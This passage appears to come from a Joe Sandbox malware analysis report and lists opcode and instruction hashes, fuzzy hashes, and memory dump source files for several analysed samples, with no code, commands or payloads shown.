                                                                                                          • Instruction ID: ee1dbf0fca53e3adfc8d444b768cc75fc51ba3de42c76aa7f0362f8888db3e33
                                                                                                          • Opcode Fuzzy Hash: e4f9d516e7f211f2502750064b2de63b6032ae14dcb4d4dee7b1e3c2fd671a80
                                                                                                          • Instruction Fuzzy Hash: C0C080704013189BC710EFE4A408B55BB7CDB02316F000165E44853144DF714540DB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fda3ccfcd7fff0ea1be159fccbf143d3a8defffd65e07a534ac4bdfb2f7aa175
                                                                                                          • Instruction ID: e7e4b24baa405f8036f520e14aa3094aaafe93118180c300a9ef5f5b271eed4d
                                                                                                          • Opcode Fuzzy Hash: fda3ccfcd7fff0ea1be159fccbf143d3a8defffd65e07a534ac4bdfb2f7aa175
                                                                                                          • Instruction Fuzzy Hash: EBC080744032189BC710EFD4A409755F7FCE706711F40419DD44853108DF714540DB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0481d849505c92572687363217c0d6021469f0554720638590436490d332069a
                                                                                                          • Instruction ID: 890bca9bebe5b90e4b26c06a427aa62f830fa4560d1d2dcf89cbc25f97e12c0e
                                                                                                          • Opcode Fuzzy Hash: 0481d849505c92572687363217c0d6021469f0554720638590436490d332069a
                                                                                                          • Instruction Fuzzy Hash: 8AA022302030038AB3200E3AC808B3833888FC03C3B0E80F0B002C08C8EA2CC2C8BB22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6c3d098559577489fd804fd71942158a0f5cae9ef2917bbbabdb7403787012fa
                                                                                                          • Instruction ID: f6f82a0076ffafa69a43183d12eb3e05b5c39dff60f6cabd03cf647a7bfb7887
                                                                                                          • Opcode Fuzzy Hash: 6c3d098559577489fd804fd71942158a0f5cae9ef2917bbbabdb7403787012fa
                                                                                                          • Instruction Fuzzy Hash: 05B012B34009019AE6105E60D904B157A21AFA0702F2988306200004C882304010FB21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000003.2286970301.000000000394F000.00000004.00000800.00020000.00000000.sdmp, Offset: 0394F000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_3_394f000_ghhqoznpon_638708802577261661.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5cae0072e60efb8bb92eb5a38089bb75053a9bc85667a22e2a562c73f1be8420
                                                                                                          • Instruction ID: d9ac6c294925ae997d7da4c412ecc8b383297f40a840b43690489732a9eaf65e
                                                                                                          • Opcode Fuzzy Hash: 5cae0072e60efb8bb92eb5a38089bb75053a9bc85667a22e2a562c73f1be8420
                                                                                                          • Instruction Fuzzy Hash: 63A1B32140E7D25FC303DF78CC656967FB5AF03210B1E45DAE480CF1A7D2695A5ACBA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_3_731000_ghhqoznpon_638708802577261661.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2c47571c0f34fe692abe3fd9e09d5f20e2de5741f76eaa11bd1246da0eda5feb
                                                                                                          • Instruction ID: 0ebc8e9be4d416b7f1e1ade4022e5d46b2a0ca765cd4df5c10f4d0dde24a9afa
                                                                                                          • Opcode Fuzzy Hash: 2c47571c0f34fe692abe3fd9e09d5f20e2de5741f76eaa11bd1246da0eda5feb
                                                                                                          • Instruction Fuzzy Hash: 0D71F22104F7D29FD7538B7488616927FB5AF07228B1E05DBD4C0CF0A3E26E595ACB62